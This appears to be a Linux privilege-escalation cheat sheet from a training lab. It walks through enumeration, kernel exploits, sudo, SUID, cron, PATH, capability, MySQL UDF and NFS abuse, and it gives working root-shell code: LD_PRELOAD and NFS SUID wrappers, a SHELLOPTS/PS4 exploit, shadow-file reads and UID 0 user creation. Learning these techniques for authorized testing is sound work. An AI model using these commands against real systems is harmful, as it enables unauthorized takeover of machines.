Linux Privilege Escalation

Privilege escalation is the search for ways to run commands that need more privileges than our current user has, e.g. reading the /etc/shadow file.

Information Gathering

Once you have a shell on the remote machine, gather the following information to find ways to escalate privilege:

  1. hostname - machine name
  2. uname -a - kernel version, architecture and build date
  3. cat /proc/version - kernel version plus the compiler that built it (Linux only)
  4. cat /etc/issue - distribution banner
  5. cat /etc/os-release - distribution name and version
  6. ps auxf - running processes, shown as a tree, with the user each one runs as
  7. env - environment variables (look for credentials, and note the PATH)
  8. sudo -l - commands the current user may run with sudo
  9. ls -la - accessible files in the current and home directories
  10. id - current user, UID and group memberships
  11. cat /etc/passwd - other local users and their login shells
  12. history - interesting commands the user ran in previous sessions (passwords are often passed on the command line)
  13. ifconfig or ip addr - network interfaces and addresses
  14. ip route - available network routes
  15. netstat -tulpn or ss -tulpn - listening services and active connections

Automated Enumeration

Different tools to check available escalation options:


Escalation Techniques

kernel exploits

  • Check the kernel version of the system: uname -a, cat /proc/version, cat /etc/issue
  • Search exploit-db for exploits published against that exact version
  • Linux Exploit Suggester is a script that does this lookup for you
  • The exploit tricks the kernel into running our payload with kernel privileges, or into writing to a file we should not be able to write
  • Compile and run the exploit
  • Eg. Dirty COW (CVE-2016-5195), a race condition in the copy-on-write handling that lets a local user write to read-only files such as /etc/passwd

Note: A kernel exploit can crash or corrupt the system irreversibly (a failed attempt often means a kernel panic and a reboot you cannot perform yourself), so run it cautiously, only for the exact version it targets, and after testing it on a matching VM.
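
The version check described above, as an added shell example that is not part of the original post: it extracts the numeric kernel version the way the enumeration commands do and compares it against the range a public exploit claims. The Dirty COW range (2.6.22 up to the fix in mainline 4.8.3) is the one given in the public advisory for CVE-2016-5195; the function and variable names are my own.

```shell
#!/bin/sh
# Added example (not from the original post): compare the running kernel
# version against the range a kernel exploit is known to work on.

# kernel_version: the numeric part of uname -r, e.g. 4.4.0 from "4.4.0-116-generic"
kernel_version() {
    uname -r | sed 's/[^0-9.].*//'
}

# kver_cmp A B: prints -1, 0 or 1 as A is lower than, equal to or higher than B,
# comparing dotted numeric components; a missing component counts as 0 and any
# distro suffix ("-generic", ".el6.x86_64") is ignored
kver_cmp() {
    a=$(printf '%s' "$1" | sed 's/[^0-9.].*//')
    b=$(printf '%s' "$2" | sed 's/[^0-9.].*//')
    i=1
    while :; do
        x=$(printf '%s' "$a" | cut -d. -f"$i")
        y=$(printf '%s' "$b" | cut -d. -f"$i")
        if [ -z "$x" ] && [ -z "$y" ]; then printf '%s\n' 0; return 0; fi
        x=${x:-0}; y=${y:-0}
        if [ "$x" -lt "$y" ]; then printf '%s\n' -1; return 0; fi
        if [ "$x" -gt "$y" ]; then printf '%s\n' 1; return 0; fi
        i=$((i + 1))
    done
}

# kver_in_range VER LOW HIGH: true when LOW <= VER < HIGH
kver_in_range() {
    [ "$(kver_cmp "$1" "$2")" -ge 0 ] && [ "$(kver_cmp "$1" "$3")" -lt 0 ]
}

# dirtycow_candidate VER: mainline kernels from 2.6.22 up to the fix in 4.8.3
# (range from the CVE-2016-5195 advisory). Distributions backport fixes without
# changing the version string, so a hit means "check the distro changelog and
# test on a matching VM", not "vulnerable".
dirtycow_candidate() {
    kver_in_range "$1" 2.6.22 4.8.3
}

# report: what the triage looks like on the current box
report() {
    v=$(kernel_version)
    printf 'kernel %s (numeric %s)\n' "$(uname -r)" "$v"
    if dirtycow_candidate "$v"; then
        printf 'version lies in the Dirty COW range: verify before running anything\n'
    else
        printf 'version is outside the Dirty COW range\n'
    fi
}

report
```

The comparison deliberately stops at the numeric part: a Red Hat "2.6.32-696.el6" kernel carries years of backported fixes that the version number does not show, which is exactly why the note above says to confirm the exact build before firing an exploit.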


Sudo permissions

  • Check sudo permissions: sudo -l
  • GTFOBins is a collated list of ways to use different sudo permissions (and SUID bits and capabilities) for privilege escalation
  • Search the binaries listed by sudo -l on that site and see if any of them can be exploited
  • Check whether any environment variable retained through env_keep can be used for escalation. Eg. LD_PRELOAD makes the dynamic loader load our shared library into the root process before anything else, so we can override functions from shared libraries
  • Exploit
  • Eg.
# Abuse the shell debugging feature: bash before 4.4 imports SHELLOPTS and PS4
# from the environment even when it runs SUID, so the command substitution in
# PS4 runs with the effective (root) UID before each traced command
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
# then run /tmp/rootbash -p (-p stops bash from dropping the effective UID)

# Abuse a sudo permission on apache2: the config parser prints the first line
# of the file it fails to parse in its error message, here root's entry from /etc/shadow
sudo apache2 -f /etc/shadow

  • Example of abusing the environment variables LD_PRELOAD or LD_LIBRARY_PATH (they only help when sudo keeps them, i.e. when env_keep lists them in the sudo -l output)
  • The Cheat Inject Feature link provides a detailed explanation of using the above variables to modify a binary's behaviour.

  • Consider this C program
// preload.c - a shared library whose _init runs as soon as the loader maps it;
// when sudo loads it into a root process we get a root shell

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid, setuid */

void _init() {
  unsetenv("LD_PRELOAD");   // do not preload ourselves into the shell we spawn
  setgid(0);
  setuid(0);
  system("/bin/bash");
}

  • The library above gets loaded into any binary started through sudo if we can pass LD_PRELOAD (or, for a library named after one the binary already links against, LD_LIBRARY_PATH) through sudo's env_keep
# use LD_PRELOAD (-nostartfiles lets our _init replace the default one):
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c
sudo LD_PRELOAD=/tmp/preload.so <program-name-here>

# use LD_LIBRARY_PATH: build a library with the same name as one the target
# loads (ldd <program-name-here> lists them), e.g. libcrypt.so.1, and point the
# loader at its directory; library_path.c (not shown here) uses the same _init idea
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
sudo LD_LIBRARY_PATH=/tmp <program-name-here>
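
The triage of sudo -l described in this section, as an added shell example that is not part of the original post. SAMPLE_SUDO_L is constructed in the format sudo prints; the set of variables treated as risky (RISKY_VARS) and all function names are my own assumptions.

```shell
#!/bin/sh
# Added example (not from the original post): pull the two things this section
# looks for out of `sudo -l` output: environment variables sudo keeps that let
# us load code into the root process, and binaries to look up on GTFOBins.
SAMPLE_SUDO_L='Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH, mail_badpass

User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (ALL : ALL) /usr/bin/apache2'

# Variables that make the dynamic loader or an interpreter run code we control
# inside the process sudo starts as root (assumed list, extend as needed)
RISKY_VARS='LD_PRELOAD LD_LIBRARY_PATH PERL5OPT PYTHONPATH BASH_ENV ENV'

# sudo_env_risks TEXT: env_keep entries in TEXT that appear in RISKY_VARS
sudo_env_risks() {
    printf '%s\n' "$1" | tr ',' '\n' \
        | sed -n 's/^[[:space:]]*env_keep+=\(.*\)/\1/p' \
        | while IFS= read -r v; do
            case " $RISKY_VARS " in *" $v "*) printf '%s\n' "$v" ;; esac
        done
}

# sudo_binaries TEXT: the program path of every "(user) [NOPASSWD:] /path" line
sudo_binaries() {
    printf '%s\n' "$1" \
        | sed -n 's|^[[:space:]]*([^)]*)[[:space:]]*\(NOPASSWD:[[:space:]]*\)\{0,1\}\(/[^ ,]*\).*|\2|p'
}

# sudo_triage TEXT: one line per finding
sudo_triage() {
    for v in $(sudo_env_risks "$1"); do
        printf 'env_keep retains %s: a library or script we control can run as root\n' "$v"
    done
    for b in $(sudo_binaries "$1"); do
        printf 'sudo allows %s: look it up on GTFOBins\n' "$b"
    done
}

# Live use on a target: sudo_triage "$(sudo -n -l 2>/dev/null)"
# (-n makes sudo fail instead of hanging on a password prompt)
sudo_triage "$SAMPLE_SUDO_L"
```

The env_keep check is the one that pairs with the preload.c trick above: without LD_PRELOAD (or LD_LIBRARY_PATH) in env_keep, sudo's env_reset strips the variable and the library is never loaded.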

SUID binaries

  • find SUID binaries: find / -type f -perm -04000 -ls 2>/dev/null or find / -type f -perm -u+s -exec ls -l {} \; 2>/dev/null
  • find SGID binaries: find / -type f -perm -02000 -ls 2>/dev/null or find / -type f -perm -g+s -exec ls -l {} \; 2>/dev/null
  • find both: find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2>/dev/null
  • Look each unusual binary up on GTFOBins; a SUID root binary runs as root no matter who starts it
  • If a SUID binary lets us write to /etc/passwd or /etc/shadow (e.g. a SUID cp, mv or editor), create a password hash with one of the commands below and add a UID 0 user, or replace root's hash
# create a unix password hash:
openssl passwd -1 -salt [salt] [password]      # MD5 crypt ($1$...)
openssl passwd newpasswordhere                 # default algorithm of the installed openssl
mkpasswd -m sha-512 newpasswordhere            # SHA-512 crypt ($6$...), from the whois package on Debian/Ubuntu
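
The SUID/SGID enumeration above, as an added shell example that is not part of the original post: it lists the set-id files under a tree and drops the ones a stock install carries, so the copied shell or custom helper stands out, and it builds the /etc/passwd line the last bullet describes. STOCK_SETID is a constructed, partial baseline and all names are my own assumptions; for real work diff against a clean box of the same distribution.

```shell
#!/bin/sh
# Added example (not from the original post): SUID/SGID triage.

# Constructed partial baseline of set-id files on a typical install (assumption)
STOCK_SETID='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/wall
/usr/bin/write'

# find_setid ROOT: every regular file under ROOT with the SUID or SGID bit
find_setid() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# unusual_setid ROOT: the same list minus the baseline, compared by the path
# relative to ROOT so it also works on a mounted image or chroot
unusual_setid() {
    root=${1%/}
    find_setid "$1" | while IFS= read -r f; do
        rel=${f#"$root"}; rel="/${rel#/}"
        if ! printf '%s\n' "$STOCK_SETID" | grep -qxF -- "$rel"; then
            printf '%s\n' "$f"
        fi
    done
}

# passwd_entry NAME HASH: an /etc/passwd line for a UID 0 account whose hash is
# in the second field, so /etc/shadow is never consulted for it. Make HASH with
# "openssl passwd -6 PASSWORD" (SHA-512) or "openssl passwd -1 PASSWORD" (MD5).
passwd_entry() {
    printf '%s:%s:0:0:%s:/root:/bin/bash\n' "$1" "$2" "$1"
}

# usage: sh this.sh /          (scans the whole system)
if [ -n "${1:-}" ]; then
    unusual_setid "$1"
fi
```

Anything unusual_setid prints deserves a look at its owner as well as its name: a SUID bit only grants the owner's privileges, so a SUID copy of bash owned by an ordinary user is noise, while one owned by root is the finish line.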


Cron jobs

  • The system-wide cron configuration is in /etc/crontab, with more jobs in /etc/cron.d/ and the /etc/cron.hourly, cron.daily, cron.weekly and cron.monthly directories; per-user crontabs live under /var/spool/cron (or /var/spool/cron/crontabs)
  • Check whether any script run by a job is writable by us (or world writable), whether a job references a script that is missing from a directory we can write to, and whether the crontab's PATH contains a writable directory that a job calling a bare command name would resolve through
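
The cron checks above, as an added shell example that is not part of the original post: it parses a crontab in the system format, collects the absolute paths each job touches and reports the ones we can write to, plus writable directories in the crontab's PATH. The crontab used in the test is constructed and the function names are my own.

```shell
#!/bin/sh
# Added example (not from the original post): find what an attacker can touch
# in a system crontab (minute hour dom month dow user command).

# cron_commands FILE: the command of every job, without comments, blank lines
# and VAR=value lines; @reboot-style jobs have two leading fields, others six
cron_commands() {
    grep -Ev '^[[:space:]]*(#|$)' "$1" | grep -Ev '^[A-Za-z_][A-Za-z0-9_]*=' \
        | awk '{ n = ($1 ~ /^@/) ? 2 : 6; for (i = 1; i <= n; i++) $i = ""; sub(/^ +/, ""); print }'
}

# cron_paths FILE: every absolute path mentioned in a job command
cron_paths() {
    cron_commands "$1" | tr ' ;|&()' '\n\n\n\n\n\n' | grep '^/' | sort -u
}

# cron_writable_scripts FILE: the paths from cron_paths that we can write to
cron_writable_scripts() {
    cron_paths "$1" | while IFS= read -r p; do
        if [ -f "$p" ] && [ -w "$p" ]; then printf '%s\n' "$p"; fi
    done
}

# cron_writable_pathdirs FILE: writable directories in the crontab's PATH;
# cron uses /usr/bin:/bin when the file sets none
cron_writable_pathdirs() {
    p=$(sed -n 's/^PATH=//p' "$1" | tail -n 1)
    [ -n "$p" ] || p='/usr/bin:/bin'
    old=$IFS; IFS=:; set -- $p; IFS=$old
    for d; do
        if [ -d "$d" ] && [ -w "$d" ]; then printf '%s\n' "$d"; fi
    done
}

# usage: sh this.sh /etc/crontab
if [ -n "${1:-}" ]; then
    cron_writable_scripts "$1"
    cron_writable_pathdirs "$1"
fi
```

A writable script is the direct win (the job runs it as its user, usually root, on the next tick); a writable PATH directory only matters for jobs that call a command by a bare name, which is the case the PATH section below covers.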

PATH variable

  • Check whether any privileged binary or script calls a command by a relative name; that name is resolved through the PATH of the process running it. List the current PATH with echo $PATH, look for directories we can write to, and drop a program with the same name there, ahead of the real one
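
The PATH hijack above, as an added shell example that is not part of the original post: resolve_cmd shows which file a bare command name maps to under a given PATH, writable_path_dirs lists the directories we could plant a binary in, and hijack_demo runs a constructed victim script with a writable directory pushed to the front of PATH. All names are my own.

```shell
#!/bin/sh
# Added example (not from the original post): PATH resolution and hijacking.

# resolve_cmd NAME [PATH]: the file a shell would execute for NAME under PATH
# (first hit wins; an empty PATH entry means the current directory)
resolve_cmd() {
    name=$1; path=${2:-$PATH}
    old=$IFS; IFS=:; set -- $path; IFS=$old
    for d; do
        [ -n "$d" ] || d=.
        if [ -f "$d/$name" ] && [ -x "$d/$name" ]; then
            printf '%s\n' "$d/$name"
            return 0
        fi
    done
    return 1
}

# writable_path_dirs [PATH]: PATH entries the current user can write to
writable_path_dirs() {
    path=${1:-$PATH}
    old=$IFS; IFS=:; set -- $path; IFS=$old
    for d; do
        [ -n "$d" ] || d=.
        if [ -d "$d" ] && [ -w "$d" ]; then printf '%s\n' "$d"; fi
    done
}

# hijack_demo: a victim script calls plain "whoami"; with our directory in front
# of PATH it finds our fake whoami before /usr/bin/whoami. A root cron job or a
# SUID wrapper doing the same thing would run our code as root.
hijack_demo() {
    dir=$(mktemp -d)
    printf '#!/bin/sh\necho hijacked\n' > "$dir/whoami"       # the planted binary
    chmod 755 "$dir/whoami"
    printf '#!/bin/sh\nwhoami\n' > "$dir/victim.sh"           # relative call, not /usr/bin/whoami
    PATH="$dir:$PATH" sh "$dir/victim.sh"
    rm -rf "$dir"
}

hijack_demo
```

The defensive reading of the same code: privileged scripts should call binaries by absolute path or set a fixed PATH themselves, because the PATH they inherit (from cron, sudo or a SUID launcher) is what resolve_cmd walks.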

File capabilities:

  • find the capabilities set on all files under the root directory: getcap -r / 2>/dev/null
  • These capabilities grant extra privileges independent of the sudo permission list, but the approach is the same as for sudo: look the binary up on GTFOBins. Eg. cap_setuid on an interpreter lets it call setuid(0) and spawn a root shell, and cap_dac_read_search lets it read any file, /etc/shadow included
  • check man 7 capabilities for the list of capabilities and what each one allows
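
The capability triage above, as an added shell example that is not part of the original post: it filters getcap -r output down to the files whose capabilities give a direct route to root. SAMPLE_GETCAP is constructed, and DANGEROUS_CAPS is my own selection from man 7 capabilities, not an exhaustive list.

```shell
#!/bin/sh
# Added example (not from the original post): pick the interesting lines out of
# `getcap -r /` output.
SAMPLE_GETCAP='/usr/bin/ping cap_net_raw=ep
/usr/bin/python3.8 cap_setuid=ep
/usr/bin/tar cap_dac_read_search=ep
/usr/sbin/mtr-packet cap_net_raw=ep
/usr/bin/perl cap_setuid,cap_net_bind_service=eip'

# Capabilities that on their own let an unprivileged user become root or read
# and write any file (assumed list drawn from man 7 capabilities)
DANGEROUS_CAPS='cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_chown cap_fowner cap_sys_admin cap_sys_ptrace cap_sys_module'

# dangerous_caps TEXT: "path cap ..." for each line carrying a capability from
# DANGEROUS_CAPS. Handles both getcap output formats: "path cap=ep" (newer
# libcap) and "path = cap+ep" (older libcap).
dangerous_caps() {
    printf '%s\n' "$1" | while IFS= read -r line; do
        [ -n "$line" ] || continue
        path=${line%% *}
        caps=${line#* }; caps=${caps#= }       # strip the "= " of the old format
        caps=${caps%%[=+]*}                    # drop the "=ep" / "+ep" flag suffix
        hits=''
        old=$IFS; IFS=,; set -- $caps; IFS=$old
        for c; do
            case " $DANGEROUS_CAPS " in *" $c "*) hits="$hits $c" ;; esac
        done
        if [ -n "$hits" ]; then printf '%s%s\n' "$path" "$hits"; fi
    done
}

# Live use on a target: dangerous_caps "$(getcap -r / 2>/dev/null)"
dangerous_caps "$SAMPLE_GETCAP"
```

cap_net_raw on ping is the normal state of a stock system and is filtered out; cap_setuid on python or perl is the finding, since a one-liner that calls setuid(0) and execs /bin/sh turns it into a root shell.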

Different services

mysql escalation

  • create the payload: a user-defined function (UDF) library that runs shell commands. raptor_udf2.c is the public raptor_udf2 UDF source (exploit-db 1518), not reproduced here
gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
  • exploit: this needs the MySQL server process running as root and a MySQL root login we can use (here one without a password)
mysql -u root

# inside the mysql shell
use mysql;

# read the library into a table, write it out into the server's plugin
# directory (check the real path with: select @@plugin_dir;) and register it
# as a UDF. If secure_file_priv is set it restricts where load_file and
# dumpfile may read and write.
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';

# the UDF runs as the mysqld user, so a root mysqld leaves us a SUID root bash
select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');


NFS

  • NFS (Network File System) configuration is kept in the /etc/exports file.
  • If a directory is exported with the no_root_squash option, root on a client keeps UID 0 on the share, so root-owned SUID files can be created on it from our machine and run on the server
  • Consider this C code
// nfs.c - a SUID root wrapper that gives a root shell

#include <stdlib.h>
#include <unistd.h>

int main()
{
  setgid(0);
  setuid(0);
  system("/bin/bash");
  return 0;
}
  • Enumerate and mount the share as root on the attacking machine, copy the executable in and set the SUID bit on the copy
# Enumerate exported shares on the target:
showmount -e 10.0.2.12

# Create a mount point locally
mkdir /tmp/shmount

# Mount the '/backups/' directory from the target machine onto the local system (as root)
mount -o rw 10.0.2.12:/backups /tmp/shmount

# Build the payload statically so it does not depend on the target's libraries
gcc -static nfs.c -o nfs

# Copy it into the share, then set SUID on the copy: cp does not carry the
# set-user-ID bit over to a new file, so chmod has to come after the copy.
# The copy is owned by root on the server because of no_root_squash.
cp ./nfs /tmp/shmount/nfs
chmod +s /tmp/shmount/nfs

  • Run the copied binary on the target machine (it appears there as /backups/nfs) to get a root shell
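
The exports check above, as an added shell example that is not part of the original post: it reads an exports file and reports each client entry carrying no_root_squash, and whether that entry also sets insecure (without it the server only accepts mounts from privileged source ports, so root on the attacking box is needed to mount). SAMPLE_EXPORTS is constructed and the function name is my own.

```shell
#!/bin/sh
# Added example (not from the original post): flag NFS exports that keep root's
# identity on the share. On a target read /etc/exports; from outside, showmount -e
# lists the paths and clients but not the options, so the file itself is the
# authoritative check.
SAMPLE_EXPORTS='# /etc/exports: constructed sample
/home/backup   10.0.2.0/24(rw,sync,no_root_squash)
/srv/public    *(ro,sync)
/srv/data      192.168.1.10(rw,no_subtree_check) 10.0.2.12(rw,no_root_squash,insecure)'

# exports_no_root_squash TEXT: "path client [insecure]" per client entry whose
# options include no_root_squash
exports_no_root_squash() {
    printf '%s\n' "$1" | grep -v '^[[:space:]]*#' | while read -r path rest; do
        [ -n "$path" ] || continue
        set -f                                   # "*" is a valid client, not a glob
        for entry in $rest; do
            client=${entry%%\(*}
            opts=${entry#*\(}; opts=${opts%\)}
            case ",$opts," in
                *,no_root_squash,*)
                    case ",$opts," in
                        *,insecure,*) printf '%s %s insecure\n' "$path" "$client" ;;
                        *)            printf '%s %s\n' "$path" "$client" ;;
                    esac ;;
            esac
        done
        set +f
    done
}

# With a hit, the staging sequence from the section above applies on our box:
#   mount -t nfs 10.0.2.12:/backups /tmp/shmount
#   cp ./nfs /tmp/shmount/nfs && chmod 4755 /tmp/shmount/nfs
exports_no_root_squash "$SAMPLE_EXPORTS"
```

Only the client that matches our source address matters: in the sample, /srv/data keeps root for 10.0.2.12 but squashes it for 192.168.1.10, so the same share is exploitable from one host and not the other.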

References

This post is licensed under CC BY 4.0 by the author.